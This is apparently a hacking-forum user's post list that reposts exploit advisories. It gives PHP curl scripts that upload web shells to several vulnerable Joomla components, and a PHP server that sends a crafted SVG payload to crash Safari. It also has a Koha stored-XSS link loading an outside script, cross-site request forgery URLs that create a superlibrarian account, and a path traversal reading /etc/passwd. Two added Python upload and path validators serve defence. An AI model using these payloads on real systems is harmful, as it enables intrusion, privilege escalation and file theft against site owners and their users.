HireHackking

Everything posted by HireHackking

  1. source: https://www.securityfocus.com/bid/53969/info

     The Art Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Art Uploader 1.0.1 is vulnerable; other versions may also be affected.

     ```php
     <?php
     $uploadfile="lo.php";
     $ch = curl_init("http://www.example.com/modules/mod_artuploader/upload.php");
     curl_setopt($ch, CURLOPT_POST, true);
     curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile", 'path'=>'./'));
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
     $postResult = curl_exec($ch);
     curl_close($ch);
     print "$postResult";
     ?>
     ```

     Shell Access : http://www.example.com/modules/mod_artuploader/lo.php

     lo.php:

     ```php
     <?php phpinfo(); ?>
     ```
  2. source: https://www.securityfocus.com/bid/53968/info

     The Simple SWFUpload component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Simple SWFUpload 2.0 is vulnerable; other versions may also be affected.

     ```php
     <?php
     $uploadfile="lo.php.gif";
     $ch = curl_init("http://www.exemple.com/administrator/components/com_simpleswfupload/uploadhandler.php");
     curl_setopt($ch, CURLOPT_POST, true);
     curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
     $postResult = curl_exec($ch);
     curl_close($ch);
     print "$postResult";
     ?>
     ```

     Shell Access : http://www.exemple.com/images/stories/lo.php.gif

     lo.php.gif:

     ```php
     <?php phpinfo(); ?>
     ```
  3. source: https://www.securityfocus.com/bid/53972/info

     The DentroVideo component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. DentroVideo 1.2 is vulnerable; other versions may also be affected.

     Exploit 1 : PostShell.php

     ```php
     <?php
     $uploadfile="lo.php";
     $ch = curl_init("http://www.example.com/components/com_dv/externals/phpupload/upload.php");
     curl_setopt($ch, CURLOPT_POST, true);
     curl_setopt($ch, CURLOPT_POSTFIELDS, array('file1'=>"@$uploadfile", 'action'=>'upload'));
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
     $postResult = curl_exec($ch);
     curl_close($ch);
     print "$postResult";
     ?>
     ```

     Shell Access : http://www.example.com/lo.php

     lo.php:

     ```php
     <?php phpinfo(); ?>
     ```

     Exploit 2 : PostShell2.php

     ```php
     <?php
     $uploadfile="lo.php.mpg3";
     $ch = curl_init("http://www.example.com/components/com_dv/externals/swfupload/upload.php");
     curl_setopt($ch, CURLOPT_POST, true);
     curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
     $postResult = curl_exec($ch);
     curl_close($ch);
     print "$postResult";
     ?>
     ```

     Shell Access : http://www.example.com/dvvideos/uploads/originals/lo.php.mpg3

     lo.php.mpg3:

     ```php
     <?php phpinfo(); ?>
     ```
  4. source: https://www.securityfocus.com/bid/53973/info

     The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. IDoEditor 1.6.16 is vulnerable; other versions may also be affected.

     ```html
     <html>
     <body>
     <center>
     <form action="http://www.example.com/plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
     <input type="file" name="pfile">
     <input type="submit" name="Submit" value="Upload">
     </form>
     </center>
     </body>
     </html>
     ```
  5. source: https://www.securityfocus.com/bid/53975/info

     The jFancy component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. jFancy 2.03 is vulnerable; other versions may also be affected.

     Exploit : PostShell.php

     ```php
     <?php
     $uploadfile="lo.php.gif";
     $ch = curl_init("http://www.example.com/modules/mod_jfancy/script.php");
     curl_setopt($ch, CURLOPT_POST, true);
     curl_setopt($ch, CURLOPT_POSTFIELDS, array('photoupload'=>"@$uploadfile"));
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
     $postResult = curl_exec($ch);
     curl_close($ch);
     print "$postResult";
     ?>
     ```

     Shell Access : http://www.example.com/images/lo.php.gif

     lo.php.gif:

     ```php
     <?php phpinfo(); ?>
     ```
  6. ```php
     #!/usr/bin/php
     <?php
     # Title : Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of Concept
     # Product Website: https://www.apple.com/safari/
     # Author : Mohammad Reza Espargham
     # Linkedin : https://ir.linkedin.com/in/rezasp
     # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
     # Website : www.reza.es
     # Twitter : https://twitter.com/rezesp
     # FaceBook : https://www.facebook.com/mohammadreza.espargham

     # Usage :
     # php poc.php
     # Open Safari and open ip:8080 / 127.0.0.1:8080
     # Crashed ;)

     #Main POC Code
     $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
     socket_bind($reza, 0,8080);
     socket_listen($reza);
     print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";
     $msg = 'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
     $msgd=base64_decode($msg);
     for (;;) {
         if ($client = @socket_accept($reza)) {
             socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd);
         } else usleep(100000);
     }

     #Crash Report
     /*
     Process Model: Multiple Web Processes

     Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
     0   libsystem_kernel.dylib        0x00007fff8e628286 __pthread_kill + 10
     1   libsystem_c.dylib             0x00007fff90619b53 abort + 129
     2   libsystem_c.dylib             0x00007fff905e1c39 __assert_rtn + 321
     3   com.apple.CoreGraphics        0x00007fff87716e4e CGPathCreateMutableCopyByTransformingPath + 242
     4   com.apple.CoreGraphics        0x00007fff8773aff0 CGContextAddPath + 93
     5   com.apple.WebCore             0x0000000104ea8c84 WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
     6   com.apple.WebCore             0x000000010597e851 WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
     7   com.apple.WebCore             0x000000010597f08a WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122
     8   com.apple.WebCore             0x000000010597f3c3 WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
     9   com.apple.WebCore             0x0000000104fa73cb WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379
     10  com.apple.WebCore             0x0000000104fa7062 WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1330
     11  com.apple.WebCore             0x0000000104f1ee72 WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722
     12  com.apple.WebCore             0x0000000105429e88 WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312
     13  com.apple.WebCore             0x0000000104ea4a63 WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
     14  com.apple.WebCore             0x0000000104ea4509 WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
     15  com.apple.WebCore             0x0000000104e53d96 WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
     16  com.apple.WebCore             0x0000000104e51373 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67
     17  com.apple.WebCore             0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
     18  com.apple.WebCore             0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
     19  com.apple.WebCore             0x00000001058db139 WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
     20  com.apple.WebCore             0x0000000104e51478 WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
     21  com.apple.WebCore             0x0000000104e51420 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
     22  com.apple.WebCore             0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
     23  com.apple.WebCore             0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
     24  com.apple.WebCore             0x0000000104e512b2 WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370
     25  com.apple.WebCore             0x0000000104e50f87 WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423
     26  com.apple.WebCore             0x0000000104e4fc30 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
     27  com.apple.WebCore             0x0000000104e4f002 WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
     28  com.apple.WebCore             0x0000000104e4fd62 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
     29  com.apple.WebCore             0x0000000104e7ac36 WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358
     30  com.apple.WebCore             0x000000010593757f WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799
     31  com.apple.WebCore             0x000000010537dd44 WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132
     32  com.apple.WebCore             0x00000001058b6ad9 WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361
     33  com.apple.WebCore             0x0000000105b170a7 WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
     34  com.apple.WebCore             0x0000000105ba36cc -[WebSimpleLayer drawInContext:] + 172
     35  com.apple.QuartzCore          0x00007fff8d7033c7 CABackingStoreUpdate_ + 3306
     36  com.apple.QuartzCore          0x00007fff8d7026d7 ___ZN2CA5Layer8display_Ev_block_invoke + 59
     37  com.apple.QuartzCore          0x00007fff8d702694 x_blame_allocations + 81
     38  com.apple.QuartzCore          0x00007fff8d6f643c CA::Layer::display_() + 1546
     39  com.apple.WebCore             0x0000000105ba35eb -[WebSimpleLayer display] + 43
     40  com.apple.QuartzCore          0x00007fff8d6f47fd CA::Layer::display_if_needed(CA::Transaction*) + 603
     41  com.apple.QuartzCore          0x00007fff8d6f3e81 CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
     42  com.apple.QuartzCore          0x00007fff8d6f3612 CA::Context::commit_transaction(CA::Transaction*) + 242
     43  com.apple.QuartzCore          0x00007fff8d6f33ae CA::Transaction::commit() + 390
     44  com.apple.QuartzCore          0x00007fff8d701f19 CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) + 71
     45  com.apple.CoreFoundation      0x00007fff869f7127 __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
     46  com.apple.CoreFoundation      0x00007fff869f7080 __CFRunLoopDoObservers + 368
     47  com.apple.CoreFoundation      0x00007fff869e8bf8 CFRunLoopRunSpecific + 328
     48  com.apple.HIToolbox           0x00007fff8df1156f RunCurrentEventLoopInMode + 235
     49  com.apple.HIToolbox           0x00007fff8df112ea ReceiveNextEventCommon + 431
     50  com.apple.HIToolbox           0x00007fff8df1112b _BlockUntilNextEventMatchingListInModeWithFilter + 71
     51  com.apple.AppKit              0x00007fff8ebe59bb _DPSNextEvent + 978
     52  com.apple.AppKit              0x00007fff8ebe4f68 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
     53  com.apple.AppKit              0x00007fff8ebdabf3 -[NSApplication run] + 594
     54  com.apple.AppKit              0x00007fff8eb57354 NSApplicationMain + 1832
     55  libxpc.dylib                  0x00007fff8ab77958 _xpc_objc_main + 793
     56  libxpc.dylib                  0x00007fff8ab79060 xpc_main + 490
     57  com.apple.WebKit.WebContent   0x0000000103f10b40 0x103f10000 + 2880
     58  libdyld.dylib                 0x00007fff873e45c9 start + 1
     */
     ?>
     ```
  7. source: https://www.securityfocus.com/bid/53977/info

     The Easy Flash Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. Easy Flash Uploader 2.0 is vulnerable; other versions may also be affected.

     ```php
     <?php
     $uploadfile="lo.php";
     $ch = curl_init("http://www.example.com/plugins/content/efup_files/helper.php");
     curl_setopt($ch, CURLOPT_POST, true);
     curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'JPATH_BASE'=>'../../../', 'filesize'=>'2000', 'filetypes'=>'*.*', 'mimetypes'=>"*", 'destination'=>'./'));
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
     $postResult = curl_exec($ch);
     curl_close($ch);
     print "$postResult";
     ?>
     ```
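     The Joomla upload advisories in items 1 to 5 and 7 all come down to the same missing server-side checks. The following is an added example, not code from any of those advisories or from Joomla: a Python upload validator that rejects the filenames those PoCs send (lo.php, lo.php.gif, lo.php.mpg3) by inspecting every extension in the name, enforcing an allowlist, matching the content's magic bytes, and storing the file under a server-chosen name. The function and constant names are this example's own assumptions.

     ```python
     """Added example, not code from any of the advisories above: a server-side
     upload validator that treats filenames the way a hardened handler should."""
     import os
     import secrets

     # Allowlisted extensions and the magic bytes a genuine file of that type starts with.
     ALLOWED_TYPES = {
         "gif": (b"GIF87a", b"GIF89a"),
         "png": (b"\x89PNG\r\n\x1a\n",),
         "jpg": (b"\xff\xd8\xff",),
         "jpeg": (b"\xff\xd8\xff",),
     }

     # Extensions that must not appear anywhere in the name. Checking only the last
     # extension is what lets "lo.php.gif" through: with a permissive handler
     # mapping (Apache AddHandler-style) the inner ".php" can still be executed.
     EXECUTABLE_EXTS = {"php", "phtml", "php3", "php4", "php5", "phar", "cgi", "pl", "py"}


     class UploadRejected(ValueError):
         """Raised with a reason when an upload must not be stored."""


     def validate_upload(filename: str, content: bytes, max_bytes: int = 2_000_000) -> str:
         """Validate an upload and return the server-chosen name to store it under.

         Raises UploadRejected if any check fails. The client's directory part and a
         separate "path"/"destination" parameter (as in the PoCs above) are never honoured.
         """
         name = os.path.basename(filename.replace("\\", "/"))
         if not name or name.startswith("."):
             raise UploadRejected("empty or hidden filename")
         if not content or len(content) > max_bytes:
             raise UploadRejected("bad size")

         extensions = name.lower().split(".")[1:]
         if not extensions:
             raise UploadRejected("no extension")
         # Every extension in the chain is checked, not just the final one.
         if any(ext in EXECUTABLE_EXTS for ext in extensions):
             raise UploadRejected("executable extension in name: " + name)
         final_ext = extensions[-1]
         if final_ext not in ALLOWED_TYPES:
             raise UploadRejected("extension not allowlisted: " + final_ext)
         # The content must really be the type the extension claims.
         if not any(content.startswith(magic) for magic in ALLOWED_TYPES[final_ext]):
             raise UploadRejected("content does not match extension " + final_ext)

         # Store under a random name: the client never controls the path on disk.
         return f"{secrets.token_hex(16)}.{final_ext}"


     def is_rejected(filename: str, content: bytes) -> bool:
         """Convenience wrapper: True if validate_upload refuses the file."""
         try:
             validate_upload(filename, content)
         except UploadRejected:
             return True
         return False


     if __name__ == "__main__":
         gif = b"GIF89a" + b"\x00" * 16  # constructed minimal GIF header
         samples = [("lo.php", b"<?php phpinfo(); ?>"), ("lo.php.gif", gif),
                    ("lo.php.mpg3", gif), ("photo.gif", b"<?php phpinfo(); ?>"),
                    ("photo.gif", gif)]
         for fn, data in samples:
             verdict = "rejected" if is_rejected(fn, data) else "stored as " + validate_upload(fn, data)
             print(fn, "->", verdict)
     ```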
  8. # Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
     # Google Dork:
     # Date: 25/06/2015
     # Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
     # Vendor Homepage: koha-community.org
     # Software Link: https://github.com/Koha-Community/Koha
     # Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
     # Tested on: Debian Linux
     # CVE : CVE-2015-4630, CVE-2015-4631

     ### CVE-2015-4631 ###

     #### Title: ####
     Multiple XSS and XSRF vulnerabilities in Koha

     #### Type of vulnerability: ####
     Koha suffers from multiple critical XSS and XSRF vulnerabilities

     ##### Exploitation vector:
     The attack can be performed through a compromised user account (for example previous password retrieval of a student user account through SQLI - CVE-2015-4633) or due to a user that clicks on a malicious link (for example in a phishing mail, forum link etc)

     ##### Attack outcome:
     1. An attacker may escalate privileges and even gain superlibrarian permissions.
     2. An attacker may target other users by stealing session tokens, impersonating them or exploiting browser vulnerabilities to gain access on their machines.
     3. Perform unauthorized actions with the permissions of a staff member
     4. Exploit other known server-side vulnerabilities (see CVE-2015-4633 and CVE-2015-4632) to fully compromise the webserver

     #### Impact: #### {low,medium,high,critical}
     critical

     #### Software/Product name: ####
     Koha

     #### Affected versions: ####
     * <= Koha 3.20.1
     * <= Koha 3.18.8
     * <= Koha 3.16.12

     #### Fixed in version: ####
     * version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/
     * version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/
     * version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

     #### Vendor: ####
     http://koha-community.org/ (Open Source)

     #### CVE number: ####
     CVE-2015-4631

     #### Timeline ####
     * `2015-06-18` identification of vulnerability
     * `2015-06-18` 1st contact to release maintainer, immediate reply
     * `2015-06-23` new release with fixed vulnerabilities

     #### Credits: ####
     RGhanad-Tavakoli@sba-research.org

     ---
     Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
     Contact: cst@sba-research.org

     #### References:
     http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
     http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
     http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
     http://koha-community.org/security-release-koha-3-20-1/
     http://koha-community.org/security-release-koha-3-18-8/
     http://koha-community.org/security-release-koha-3-16-12/

     #### Description: ####
     Koha suffers from various critical XSS and XSRF vulnerabilities due to improper input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site request forgery (XSRF) attacks. This allows remote attackers to inject arbitrary web script or HTML and completely compromise the webpage.

     The following pages are affected from stored XSS flaws:

     * /cgi-bin/koha/opac-shelves.pl
     * /cgi-bin/koha/virtualshelves/shelves.pl

     The following pages are affected from reflective XSS flaws:

     * /cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display")
     * /cgi-bin/koha/opac-search.pl (parameters: "tag")
     * /cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")
     * /cgi-bin/koha/acqui/lateorders.pl (parameters: "delay")
     * /cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode", "tagfield")
     * /cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
     * /cgi-bin/koha/catalogue/search.pl (parameters: "limit")
     * /cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter")
     * /cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")

     #### Proof-of-concept: ####

     Attack scenario:

     Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:

     ```
     http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0
     ```

     Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl the malicious code gets executed. The code can then perform any unauthorized actions with the permissions of user Bob.

     For example:

     Create new user:

     ```
     http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1
     ```

     Give the new user superlibrarian permission:

     ```
     http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian
     ```

     The attacker can now log in as superlibrarian.

     Side Note: In order to make the attack work, Alice needs to be logged in to the Open Public Catalog interface at the time of clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists.
  9. # Exploit Title: Koha Open Source ILS - Path Traversal in STAFF client
     # Google Dork:
     # Date: 25/06/2015
     # Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
     # Vendor Homepage: koha-community.org
     # Software Link: https://github.com/Koha-Community/Koha
     # Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
     # Tested on: Debian Linux
     # CVE : CVE-2015-4632

     ### CVE-2015-4632 ###

     #### Title: ####
     Directory traversal

     #### Type of vulnerability: ####
     File Path Traversal

     ##### Exploitation vector:
     Injecting into the "template_path" parameter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search

     ##### Attack outcome:
     Read access to arbitrary files on the system

     #### Impact: #### {low,medium,high,critical}
     high

     #### Software/Product name: ####
     Koha

     #### Affected versions: ####
     * <= Koha 3.20.1
     * <= Koha 3.18.8
     * <= Koha 3.16.12

     #### Fixed in version: ####
     * version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/
     * version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/
     * version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

     #### Vendor: ####
     http://koha-community.org/ (Open Source)

     #### CVE number: ####
     CVE-2015-4632

     #### Timeline ####
     * `2015-06-18` identification of vulnerability
     * `2015-06-18` 1st contact to release maintainer, immediate reply
     * `2015-06-23` new release with fixed vulnerabilities

     #### Credits: ####
     RGhanad-Tavakoli@sba-research.org

     ---
     Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
     Contact: cst@sba-research.org

     #### References:
     http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
     http://koha-community.org/security-release-koha-3-20-1/
     http://koha-community.org/security-release-koha-3-18-8/
     http://koha-community.org/security-release-koha-3-16-12/

     #### Description: ####
     Multiple directory traversal vulnerabilities allow remote attackers to read arbitrary files via a .. (dot dot) in (1) /cgi-bin/koha/svc/virtualshelves/search and (2) in /cgi-bin/koha/svc/members/search

     #### Proof-of-concept: ####

     ```
     /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
     /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
     ```
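     The traversal above works because a caller-supplied template_path is joined to the template directory without a containment check. The following is an added example, not Koha's code and written in Python rather than Koha's Perl: it percent-decodes the value until stable, restricts it to the template extension, canonicalises the joined path and refuses anything that resolves outside the template root. The root directory and the .tt extension are assumptions of the example.

     ```python
     """Added example, not Koha's code: confine a caller-supplied template name to a
     fixed template directory, the check whose absence CVE-2015-4632 describes."""
     import os
     from urllib.parse import unquote

     TEMPLATE_EXT = ".tt"  # assumption: only Template Toolkit files may be requested


     def percent_decode_fully(value: str, max_rounds: int = 3) -> str:
         """Decode %xx repeatedly so a double-encoded "..%252f" is seen as "../" too."""
         for _ in range(max_rounds):
             decoded = unquote(value)
             if decoded == value:
                 break
             value = decoded
         return value


     def resolve_template(root: str, requested: str):
         """Return the absolute path of the requested template inside root, or None.

         None means the request must be refused with an error; the caller must not
         fall back to using the raw value.
         """
         root = os.path.realpath(root)
         name = percent_decode_fully(requested).replace("\\", "/")
         if not name or "\x00" in name or name.startswith("/"):
             return None
         if not name.endswith(TEMPLATE_EXT):
             return None
         # realpath collapses "../" segments (and follows symlinks) before the check,
         # so the comparison is made on the path that would actually be opened.
         candidate = os.path.realpath(os.path.join(root, name))
         if os.path.commonpath([root, candidate]) != root:
             return None
         return candidate


     if __name__ == "__main__":
         root = "/srv/koha/templates"  # assumed location, used only for the demonstration
         for value in ("members/search.tt",
                       "..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
                       "..%252f..%252fetc%2fpasswd",
                       "../../../evil.tt"):
             print(repr(value), "->", resolve_template(root, value))
     ```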
  10. # Exploit Title: Koha Open Source ILS - Unauthenticated SQL Injection in OPAC
      # Google Dork:
      # Date: 25/06/2015
      # Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
      # Vendor Homepage: koha-community.org
      # Software Link: https://github.com/Koha-Community/Koha
      # Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
      # Tested on: Debian Linux
      # CVE : CVE-2015-4633

      ### CVE-2015-4633 ###

      #### Title: ####
      Unauthenticated SQL Injection in Koha

      #### Type of vulnerability: ####
      An Unauthenticated SQL Injection vulnerability in Koha allows attackers to read arbitrary data from the database.

      ##### Exploitation vector:
      The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.

      ##### Attack outcome:
      An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

      #### Impact: ####
      critical

      #### Software/Product name: ####
      Koha

      #### Affected versions: ####
      * <= Koha 3.20.1
      * <= Koha 3.18.8
      * <= Koha 3.16.12

      #### Fixed in version: ####
      * version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/
      * version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/
      * version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

      #### Vendor: ####
      http://koha-community.org/ (Open Source)

      #### CVE number: ####
      CVE-2015-4633

      #### Timeline ####
      * `2015-06-18` identification of vulnerability
      * `2015-06-18` 1st contact to release maintainer, immediate reply
      * `2015-06-23` new release with fixed vulnerabilities

      #### Credits: ####
      RGhanad-Tavakoli@sba-research.org

      ---
